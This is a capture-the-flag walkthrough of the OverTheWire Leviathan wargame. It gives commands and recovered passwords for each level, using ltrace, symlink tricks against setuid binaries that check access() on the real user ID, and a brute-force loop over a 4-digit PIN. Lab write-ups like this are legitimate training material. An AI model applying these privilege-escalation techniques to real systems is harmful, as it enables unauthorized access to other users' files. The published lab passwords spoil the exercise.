Leviathan Writeup

Table of Contents

1. Intro Reading
2. Level 0 -> Level 1
3. Level 1 -> Level 2
4. Level 2 -> Level 3
5. Level 3 -> Level 4
6. Level 4 -> Level 5
7. Level 5 -> Level 6
8. Level 6 -> Level 7
9. Level 7

Intro Reading

This wargame doesn't require any knowledge about programming - just a bit of common sense and some knowledge about basic *nix commands. We had no idea that it'd be this hard to make an interesting wargame that wouldn't require programming abilities from the players.

Leviathan’s levels are called leviathan0, leviathan1, … etc . and can be accessed on leviathan.labs.overthewire.org through SSH on port 2223.

Data for the levels can be found in the homedirectories. You can look at /etc/leviathan_pass for the various level passwords.

To login to the first level:
Username: leviathan0
Password: leviathan0

Level 0 -> Level 1

$ ssh leviathan0@leviathan.labs.overthewire.org -p 2223
$ ls -l /etc/leviathan_pass/
$ ls -la
$ cd .backup/
$ ls -la
$ cat bookmarks.html | grep password
            

To login to the next level:
Username: leviathan1
Password: rioGegei8m

Level 1 -> Level 2

$ ssh leviathan1@leviathan.labs.overthewire.org -p 2223
$ ls -la
$ strings check
$ ltrace ./check
            

Insert a random password, you'll notice that there is strcmp("your_input\n", "sex")

$ ./check
        

Using "sex" as password, you are now logged as leviathan2 (use command 'bash' if you want to pass to original bash view)

$ cat /etc/leviathan_pass/leviathan2
            

To login to the next level:
Username: leviathan2
Password: ougahZi8Ta

Level 2 -> Level 3

$ ssh leviathan2@leviathan.labs.overthewire.org -p 2223
$ ls -la
          

Launch the ./printfile executable; you'll notice that the program outputs the text from a file; let's create a tmp file and see what happened inside the program

$ mkdir /tmp/test && touch test.txt
$ ltrace ./printfile /tmp/test/test.txt
        

As you can see the access function is called on the input file; access() checks permission based on the real user ID instead of the effective user ID this can be exploited since the ./printfile is owned by leviathan3 user. It is also noticeable that /bin/cat is being called on the file to output the contents; /bin/cat uses just the first part of the filename. Let's try to add a space to the filename, and see if /bin/cat will read the file as two separate files.

$ touch "space test.txt"
$ ltrace ~/printfile space\ test.txt
      

It was right. It's exploitable.
Let's create a symbolic link for our first part of the file and link it to /etc/leviathan_pass/leviathan3

$ ln -s /etc/leviathan_pass/leviathan3 /tmp/jimmy/space
$ ~/printfile space\ test.txt
      

To login to the next level:
Username: leviathan3
Password: Ahdiemoo1j

Level 3 -> Level 4

$ ssh leviathan3@leviathan.labs.overthewire.org -p 2223
$ ls -la
      

Launch the ./level3 executable; you'll notice that the program asks for a password; let's try ltrace command and see if it works

$ ltrace ./level3
    # the password is compared to "snlprintf". Try to input it

$ ./level3
    # password: snlprintf

$ whoami
    # leviathan3
    

As you can see a shell has appeared but we are still leviathian3 user. Let's try to run again the ./level3 executable inside this shell

$ ltrace ./level3
    # again the password is compared to "snlprintf". Try to input it

$ ./level3
    # password: snlprintf

$ whoami
    # leviathan4

$ cat /etc/leviathan_pass/leviathan4
    

To login to the next level:
Username: leviathan4
Password: vuH0coox6m

Level 4 -> Level 5

Exploring the folder tree and the file, we can see that there is a folder called .trash inside which there's a file called ./bin . Run the executable and decode the binary to ASCII.

    $ ssh leviathan4@leviathan.labs.overthewire.org -p 2223
    $ ls -lah
    $ cd .trash
    $ ./bin
    $ echo 01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010 | perl -lape '$_=pack"(B8)*",@F'

    # if the number is without spaces
    ($ echo 0101010001101001011101000110100000110100011000110110111101101011011001010110100100001010 | perl -lpe '$_=pack"B*",$_')
        

To login to the next level:
Username: leviathan5
Password: Tith4cokei

Level 5 -> Level 6

Running the executable ./leviathan5 we can notice that it seems to read the content of a file /tmp/file.log which we cannot modify. What we can do it's try to create a symbolic link through which we can access the desired leviathan6 password file.

    $ ssh leviathan5@leviathan.labs.overthewire.org -p 2223
    $ ls -lah
    $ ./leviathan5
        # Cannot find /tmp/file.log

    $ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
    $ ./leviathan5
        

To login to the next level:
Username: leviathan6
Password: UgaoFee4li

Level 6 -> Level 7

Running the executable ./leviathan6 we can notice that it seems to accept a 4 digit code. Let's try to bruteforce it.

    $ ssh leviathan6@leviathan.labs.overthewire.org -p 2223
    $ ls -lah
    $ ./leviathan6 1234
        # Wrong

    $ for i in {0000..9999}; do echo $i; ./leviathan6 $i; done
        

The password correct is 7123. With the right 4 digits the executable launch a shell as a leviathan7 user; let's hust read the password file.

    $ cat /etc/leviathan_pass/leviathan7
        

To login to the next level:
Username: leviathan7
Password: ahy7MaeBo9

Level 7

    $ ssh leviathan7@leviathan.labs.overthewire.org -p 2223
    $ ls -lah
    $ cat CONGRATULATIONS
        

Well Done, you seem to have used a *nix system before, now try something more serious